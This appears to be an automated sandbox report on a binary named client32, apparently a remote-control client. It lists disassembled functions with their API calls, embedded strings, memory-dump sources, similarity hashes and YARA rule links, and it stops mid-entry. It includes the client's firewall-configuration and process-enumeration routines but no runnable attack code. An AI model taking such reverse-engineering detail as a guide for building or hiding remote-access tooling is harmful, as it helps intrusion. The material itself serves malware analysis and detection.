Opcode Fuzzy Hash: cf1052e5be71f3d434893412861ad9ad259e2ba0693b2699e7433d6c9e4175ae
Instruction Fuzzy Hash: 62514635E012669BDF01CF68CCC4BEEFBE1AF81318F5081A9DC5667280E7326445CB85

Function 6CC67640 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,6CC74E05), ref: 6CC676AB

Part of subcall function 6CC63A70: LoadLibraryA.KERNEL32(psapi.dll,?,6CC67708), ref: 6CC63A78

GetCurrentProcessId.KERNEL32 ref: 6CC6770B
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6CC67718
FreeLibrary.KERNEL32(?), ref: 6CC677FF

Part of subcall function 6CC63AB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6CC63AC4
Part of subcall function 6CC63AB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6CC6774D,00000000,?,6CC6774D,00000000,?,00000FA0,?), ref: 6CC63AE4

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6CC677EE

Part of subcall function 6CC63B00: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6CC63B14
Part of subcall function 6CC63B00: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6CC67790,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6CC63B34

Part of subcall function 6CC62420: _strrchr.LIBCMT ref: 6CC6242E

Strings

pcictl_247.dll, xrefs: 6CC677AC
is247, xrefs: 6CC67682
NSM247, xrefs: 6CC676CB
NSM247Ctl.dll, xrefs: 6CC677BE
Set Is247=%d, xrefs: 6CC67817
CLIENT247, xrefs: 6CC676E7

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
API String ID: 2714439535-3484705551
Opcode ID: 58881ad7fe89380552bbf7e359784558c78f884d55902453600c98a8185c643a
Instruction ID: 0ae2dae1b84298ad829840cbd6d65bc73f5f5b1d8fc2ba1e66c85121f12e7e3e
Opcode Fuzzy Hash: 58881ad7fe89380552bbf7e359784558c78f884d55902453600c98a8185c643a
Instruction Fuzzy Hash: 9E410B71A001189FEB01DB52DEC8FEA77B8FB45708F000459EA05E3E40FB359A45DBA1

Function 1114CE30 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1114CE58
GetLastError.KERNEL32 ref: 1114CE65
wsprintfA.USER32 ref: 1114CE78

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Part of subcall function 11027FB0: _strrchr.LIBCMT ref: 110280A5
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 110280E4

GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1114CEBC
GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1114CEC9

Strings

NSMDropTarget, xrefs: 1114CEBE
NSMWndClass, xrefs: 1114CE50
NSMReflect, xrefs: 1114CEB7
..\ctl32\wndclass.cpp, xrefs: 1114CE89, 1114CEA5
GlobalAddAtom failed, e=%d, xrefs: 1114CE72
m_aProp, xrefs: 1114CEAA

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
API String ID: 1734919802-1728070458
Opcode ID: 5d1924ba33bc5dfec19d76dfc76a92801d5f3f97a695d21cd7be10a704ebc820
Instruction ID: 1eda9b10f8aec855e66c0cb12e8f2ce1967035abfcae5e92ab0cd4d6df15dcd3
Opcode Fuzzy Hash: 5d1924ba33bc5dfec19d76dfc76a92801d5f3f97a695d21cd7be10a704ebc820
Instruction Fuzzy Hash: 64110A79E01354EBC720EFE6DCC5B96FBB4BF24318B40462ED86553644EB706540CBA1

Function 111035C0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

std::exception::exception.LIBCMT ref: 1110362A
__CxxThrowException@8.LIBCMT ref: 1110363F
GetCurrentThreadId.KERNEL32 ref: 11103656
InitializeCriticalSection.KERNEL32(-00000010,?,1102F49F,00000001,00000000), ref: 11103669
InitializeCriticalSection.KERNEL32(111DC080,?,1102F49F,00000001,00000000), ref: 11103678
EnterCriticalSection.KERNEL32(111DC080,?,1102F49F), ref: 1110368C
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1102F49F), ref: 111036B2
LeaveCriticalSection.KERNEL32(111DC080,?,1102F49F), ref: 1110373F

Strings

..\ctl32\Refcount.cpp, xrefs: 111036C6
QueueThreadEvent, xrefs: 111036CB

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
API String ID: 1976012330-1024648535
Opcode ID: e29206a9896a06f922e4cf0ceb9f136b07e2850f4e50c880c62728fdaeafb3db
Instruction ID: 63fd93a488f830275771722d5aba5e66412ef535a9f58e0bfc3bcbadc2d60674
Opcode Fuzzy Hash: e29206a9896a06f922e4cf0ceb9f136b07e2850f4e50c880c62728fdaeafb3db
Instruction Fuzzy Hash: 2241A0B9E04614AFDB11DFA59C88B9BFBE4FB46708F10863EE816D7244E63595008B61

Function 11125790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11134770: _memset.LIBCMT ref: 111347B5
Part of subcall function 11134770: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 111347CE
Part of subcall function 11134770: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111347F5
Part of subcall function 11134770: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11134807
Part of subcall function 11134770: FreeLibrary.KERNEL32(00000000), ref: 1113481F
Part of subcall function 11134770: GetSystemDefaultLangID.KERNEL32 ref: 1113482A

AdjustWindowRectEx.USER32(11130C07,00CE0000,00000001,00000030), ref: 111257D7
LoadMenuA.USER32(00000000,000003EC), ref: 111257E8
GetSystemMetrics.USER32(00000021), ref: 111257F9
GetSystemMetrics.USER32(0000000F), ref: 11125801
GetSystemMetrics.USER32(00000004), ref: 11125807
GetDC.USER32(00000000), ref: 11125813
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1112581E
ReleaseDC.USER32(00000000,00000000), ref: 11125827
CreateWindowExA.USER32(?,NSMWClass,0261E268,00CE0000,80000000,80000000,?,?,00000000,?,11000000,00000000), ref: 11125869

Strings

NSMWClass, xrefs: 11125863

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceFreeLangMenuProcRectReleaseVersion_memset
String ID: NSMWClass
API String ID: 1971969616-4111455598
Opcode ID: c4fd1fae337c8dcba66663149ed27480893a34112c7b95a9b8bf325c2f5c25ff
Instruction ID: 3d151e6aa5795be314d149eabed09166d4b089190cfc9127ba122f3c3f80b994
Opcode Fuzzy Hash: c4fd1fae337c8dcba66663149ed27480893a34112c7b95a9b8bf325c2f5c25ff
Instruction Fuzzy Hash: 582165B6E40219AFDB10DFE5CC89FAEFBB8EB44704F514529FA15B7284D6B069008B90

Function 1105C0C0 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,1116DC62,00000000,00000000,2F623E72,00000000,?,00000000), ref: 1105C144
_malloc.LIBCMT ref: 1105C18B

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,2F623E72,00000000), ref: 1105C1CB
RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 1105C232
_free.LIBCMT ref: 1105C244

Strings

err == 0, xrefs: 1105C158
maxname < _tsizeof (m_szSectionAndKey), xrefs: 1105C178
..\ctl32\Config.cpp, xrefs: 1105C153, 1105C173, 1105C345
strlen (k.m_k) < _tsizeof (m_szSectionAndKey), xrefs: 1105C34A

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
API String ID: 999355418-161875503
Opcode ID: 98bcf97b81f2fd7fc0e3e3060bef5b5148310107f14ce8a6a55b4b12b04d3ae8
Instruction ID: 5b8d9771a3f568fac0bea788f5fe62047a63eb04c33da05d267035309ea0bb05
Opcode Fuzzy Hash: 98bcf97b81f2fd7fc0e3e3060bef5b5148310107f14ce8a6a55b4b12b04d3ae8
Instruction Fuzzy Hash: D6A1B275A007469FD7A1CF64C980BABBBF8BF49304F044A5CE59697681E770F508CBA1

Function 11108F70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11108FC5
CoCreateInstance.OLE32(111AC5EC,00000000,00000001,111AC5FC,00000000,?,00000000,Client,silent,00000000,00000000,?,110489EB), ref: 11108FDF
LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11109004
GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11109016
SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11109029
FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11109035
CoUninitialize.COMBASE(00000000), ref: 111090D1

Strings

SHELL32.DLL, xrefs: 11108FF5
SHGetSettings, xrefs: 11109010

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
String ID: SHELL32.DLL$SHGetSettings
API String ID: 4195908086-2348320231
Opcode ID: 6d34685f4c316705df0f1abe8123d38b31d7fd1e4502876d89345956c5a31854
Instruction ID: 81cc2272e8ad22c1156deef73db3ee6d204820a72fecb0aa9db9e7dded57e48d
Opcode Fuzzy Hash: 6d34685f4c316705df0f1abe8123d38b31d7fd1e4502876d89345956c5a31854
Instruction Fuzzy Hash: 9A5161B5E002099FDB00DF95C9D4AAFFBB9EF88304F118569EA19A7244E731A941CB61

Function 11134770 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 11134660: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111346D0
Part of subcall function 11134660: RegCloseKey.ADVAPI32(?), ref: 11134734

_memset.LIBCMT ref: 111347B5
GetVersionExA.KERNEL32(?,00000000,00000000), ref: 111347CE
LoadLibraryA.KERNEL32(kernel32.dll), ref: 111347F5
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11134807
FreeLibrary.KERNEL32(00000000), ref: 1113481F
GetSystemDefaultLangID.KERNEL32 ref: 1113482A

Strings

GetUserDefaultUILanguage, xrefs: 11134801
kernel32.dll, xrefs: 111347E0

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 4251163631-545709139
Opcode ID: def513b5bb341cc7afad5bcd91c09d54c4c598062c949e7b226e29cf6b61c9db
Instruction ID: 437fe0f25426a0c81b88db6811d1175116249bb1d1675cf6c1db19aceed975f5
Opcode Fuzzy Hash: def513b5bb341cc7afad5bcd91c09d54c4c598062c949e7b226e29cf6b61c9db
Instruction Fuzzy Hash: 5C314539E502659FDB10CFB4C984B8AF7A4EB8933AF4001F9D829D3289CB344984CB91

Function 11128750 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

Part of subcall function 1108F8C0: CoInitialize.OLE32(00000000), ref: 1108F8D4
Part of subcall function 1108F8C0: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?), ref: 1108F8E7
Part of subcall function 1108F8C0: CoCreateInstance.OLE32(?,00000000,00000001,111AC67C,?), ref: 1108F904
Part of subcall function 1108F8C0: CoUninitialize.COMBASE ref: 1108F922

_memset.LIBCMT ref: 111287B0
GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,00000000), ref: 111287C6
_strrchr.LIBCMT ref: 111287D5
_free.LIBCMT ref: 11128826

Strings

Client, xrefs: 11128774
*AutoICFConfig, xrefs: 1112876F
ICFConfig2 returned 0x%x, xrefs: 1112882C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
String ID: *AutoICFConfig$Client$ICFConfig2 returned 0x%x
API String ID: 3753348462-81074719
Opcode ID: d6a938e01ba48f2098115e7c25638f1083b752ba40fe7202dab8389a74f7b7bb
Instruction ID: efd7c66bd05c6e10d55467fd07ad58ab98d8359d2b254dc54f01deb450eb345c
Opcode Fuzzy Hash: d6a938e01ba48f2098115e7c25638f1083b752ba40fe7202dab8389a74f7b7bb
Instruction Fuzzy Hash: D1213879E0061966D750DB649C06FDBF7A89F4670CF404198FE08A61C0EEF1AA80CAE1

Function 11133F90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

nsmdir < GP_MAX, xrefs: 11133FBC
..\ctl32\util.cpp, xrefs: 11133FB7, 11134059
FALSE || !"wrong nsmdir", xrefs: 1113405E

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
API String ID: 3494822531-1878648853
Opcode ID: 79dec2e5e86b3296e7b7cbf95b33fee3af2b2340604abb3e6bf60fc7f45b26ba
Instruction ID: cecf8e71dd9fb6e936cb624b8a237d093ff43f0dbaa42a0567fc90792f6e72d7
Opcode Fuzzy Hash: 79dec2e5e86b3296e7b7cbf95b33fee3af2b2340604abb3e6bf60fc7f45b26ba
Instruction Fuzzy Hash: 3351BA3AE5461A5BDB11CB249D14BDEFBB4AF80318F0001E4DCC977288DA71AA84CBD2

Function 6CC715D0 Relevance: 10.6, APIs: 7, Instructions: 115COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 6CC7160B
GetTickCount.KERNEL32 ref: 6CC7165D
InterlockedExchange.KERNEL32(-00039134,00000000), ref: 6CC71668
_calloc.LIBCMT ref: 6CC71688
_memmove.LIBCMT ref: 6CC71696
InterlockedDecrement.KERNEL32(-0003918C), ref: 6CC716CC
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,933554B7), ref: 6CC716D9

Part of subcall function 6CC710C0: wsprintfA.USER32 ref: 6CC71147

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
String ID:
API String ID: 3178096747-0
Opcode ID: 149cadd5defd484d264a9ecd7d2ca12fa43282bafa426c3bd9bc4dfbe195afa4
Instruction ID: 25e47321135e259298bb44e1acebbf7809dfdcdbfa1fba8f7b2f324bcea545f1
Opcode Fuzzy Hash: 149cadd5defd484d264a9ecd7d2ca12fa43282bafa426c3bd9bc4dfbe195afa4
Instruction Fuzzy Hash: D5415FB6D00209AFDB10CFA9C8849EFBBF8FB48304F44855AE519E7640F775D6498BA0

Function 110FA7D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 11102970: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,1110371D,00000000,00000001,?,?,?,?,?,1102F49F), ref: 1110298E

